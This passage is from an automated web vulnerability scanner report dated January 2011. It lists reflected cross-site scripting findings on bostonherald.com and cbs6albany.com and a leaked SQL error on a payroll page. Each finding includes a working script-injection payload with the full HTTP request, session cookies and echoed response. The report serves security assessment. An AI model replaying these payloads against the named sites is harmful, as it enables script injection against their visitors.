This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /projects/payroll/worcester/?f4ac7(a)0dc08ce248a=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:42:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 374
Content-Type: text/html; charset=UTF-8
Connection: close

SQL:
SELECT a.* FROM `worcesterData` a WHERE 1=1 ORDER BY ?f4ac7(a)0dc08ce248a=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?f4ac7(a)0dc08ce248a=1 LIMIT 0,20' at line
...[SNIP]...

4.813. http://www.bostonherald.com/search/ [topic parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/search/

Issue detail

The value of the topic request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2820"><script>alert(1)</script>647d2a3054 was submitted in the topic parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?topic=Rep.+James+Valleec2820"><script>alert(1)</script>647d2a3054&srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:08:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<input class="mainSearchinut" id="searchInput" type="text" value="Rep. James Valleec2820"><script>alert(1)</script>647d2a3054" name="topic" />
...[SNIP]...

4.814. http://www.bostonherald.com/search/ [topic parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/search/

Issue detail

The value of the topic request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60651</script><script>alert(1)</script>03fb46f749a was submitted in the topic parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /search/?topic=Rep.+James+Vallee60651</script><script>alert(1)</script>03fb46f749a&srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:08:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<script language="Javascript">
// Ajax search

page($('search_opt_type').options[$('search_opt_type').selectedIndex].value,'1','','search','Rep. James Vallee60651</script><script>alert(1)</script>03fb46f749a');
//pageTracker._trackPageview('/search/index.bg?&order=&page=1');
location.hash='articleFull';
</script>
...[SNIP]...

4.815. http://www.cbs6albany.com/albany-community/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/albany-community/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a4e73'><script>alert(1)</script>3aa125e23eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-communitya4e73'><script>alert(1)</script>3aa125e23eb/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:35:03 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:45:03 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 43346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/albany-communitya4e73'><script>alert(1)</script>3aa125e23eb/'>
...[SNIP]...

4.816. http://www.cbs6albany.com/albany-community/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/albany-community/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d2433'><script>alert(1)</script>1aa9284fca0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-community/?d2433'><script>alert(1)</script>1aa9284fca0=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:34:10 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:44:10 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 43349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/albany-community/?d2433'><script>alert(1)</script>1aa9284fca0=1'>
...[SNIP]...

4.817. http://www.cbs6albany.com/albany-tv-programming/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/albany-tv-programming/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 75854'><script>alert(1)</script>1f82ca7f1ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-tv-programming75854'><script>alert(1)</script>1f82ca7f1ce/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:34:54 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:44:54 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/albany-tv-programming75854'><script>alert(1)</script>1f82ca7f1ce/'>
...[SNIP]...

4.818. http://www.cbs6albany.com/albany-tv-programming/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/albany-tv-programming/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57577'><script>alert(1)</script>892855b7f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-tv-programming/?57577'><script>alert(1)</script>892855b7f8=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:34:05 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:44:05 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/albany-tv-programming/?57577'><script>alert(1)</script>892855b7f8=1'>
...[SNIP]...

4.819. http://www.cbs6albany.com/albany-weather-forecast [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/albany-weather-forecast

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8cdf9'><script>alert(1)</script>9e8a6ed6891 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-weather-forecast8cdf9'><script>alert(1)</script>9e8a6ed6891 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:35:48 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:45:48 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 55398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/albany-weather-forecast8cdf9'><script>alert(1)</script>9e8a6ed6891'>
...[SNIP]...

4.820. http://www.cbs6albany.com/albany-weather-forecast [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/albany-weather-forecast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dec0c'><script>alert(1)</script>262a2c2a00e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-weather-forecast?dec0c'><script>alert(1)</script>262a2c2a00e=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:34:54 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:44:54 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 55413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/albany-weather-forecast?dec0c'><script>alert(1)</script>262a2c2a00e=1'>
...[SNIP]...

4.821. http://www.cbs6albany.com/common/archives/ [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/common/archives/

Issue detail

The value of the cat request parameter is copied into the HTML document as plain text between tags. The payload abbec<script>alert(1)</script>e73f5d44298 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/archives/?cat=Movie+Reviewsabbec<script>alert(1)</script>e73f5d44298&db=fbi&template=movie.html HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:31:25 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:41:25 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
</script>e73f5d44298/?fabc=1&catID=0">Movie Reviewsabbec<script>alert(1)</script>e73f5d44298</a>
...[SNIP]...

4.822. http://www.cbs6albany.com/common/archives/ [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/common/archives/

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a1e6"><script>alert(1)</script>604e981a33a was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/archives/?cat=Movie+Reviews8a1e6"><script>alert(1)</script>604e981a33a&db=fbi&template=movie.html HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:31:14 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:41:14 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="/sections/movie-reviews8a1e6"><script>alert(1)</script>604e981a33a/?fabc=1&catID=0">
...[SNIP]...

4.823. http://www.cbs6albany.com/common/archives/ [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/common/archives/

Issue detail

The value of the cat request parameter is copied into the HTML document as text between TITLE tags. The payload a03b2</title><script>alert(1)</script>e15addb93fd was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/archives/?cat=Movie+Reviewsa03b2</title><script>alert(1)</script>e15addb93fd&db=fbi&template=movie.html HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:31:36 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:41:36 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 25004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<title>Movie Reviewsa03b2</title><script>alert(1)</script>e15addb93fd Archive Stories - WRGB CBS 6 Albany</title>
...[SNIP]...

4.824. http://www.cbs6albany.com/common/archives/ [db parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/common/archives/

Issue detail

The value of the db request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc8ee"><script>alert(1)</script>d814807c00f was submitted in the db parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/archives/?cat=Movie+Reviews&db=fbifc8ee"><script>alert(1)</script>d814807c00f&template=movie.html HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:31:57 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:41:57 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="/common/archives/?db=fbifc8ee"><script>alert(1)</script>d814807c00f">
...[SNIP]...

4.825. http://www.cbs6albany.com/common/tools/load.php [css parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/common/tools/load.php

Issue detail

The value of the css request parameter is copied into the HTML document as plain text between tags. The payload 923ab<script>alert(1)</script>1fc4a4d87cc was submitted in the css parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/tools/load.php?css=common_poll,common_layout_newspaper_nonav,common_nav,common_bcstyle,common_search,common_election,common_zvents,common_broadcast,site923ab<script>alert(1)</script>1fc4a4d87cc HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298828234584%26vn%3D1; s_invisit=true; c_m=NoneDirect%20LoadDirect%20Load; cf=1; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296367200803%26vn%3D1; sinvisit_w=true; s_vnum_m=1296540000804%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:41:50 GMT
Server: Apache
Last-Modified: Sat, 29 Jan 2011 01:41:53 GMT
ETag: "d09207c4f3a16792c6068f097542a7c7-69981"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 01:41:50 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/css
Content-Length: 69981

/* http://www.cbs6albany.com/common/tools/load.php?css=common_poll,common_layout_newspaper_nonav,common_nav,common_bcstyle,common_search,common_election,common_zvents,common_broadcast,site923ab<script>alert(1)</script>1fc4a4d87cc */
.articlepoll #pollwrapper {
width:249px;
}

.pollbars {
   font-family: Arial, Helvetica;
   font-size: 10px;
   font-style: normal;
   color: #ffffff;
   background-color: #000066;
   line-height: 1
...[SNIP]...

4.826. http://www.cbs6albany.com/common/tools/load.php [js parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/common/tools/load.php

Issue detail

The value of the js request parameter is copied into a JavaScript inline comment. The payload 24549*/alert(1)//d473b38e549 was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /common/tools/load.php?js=common_poll,common_nav,common_tabBox,common_contentslider,common_freedom,common_ads,common_page24549*/alert(1)//d473b38e549 HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
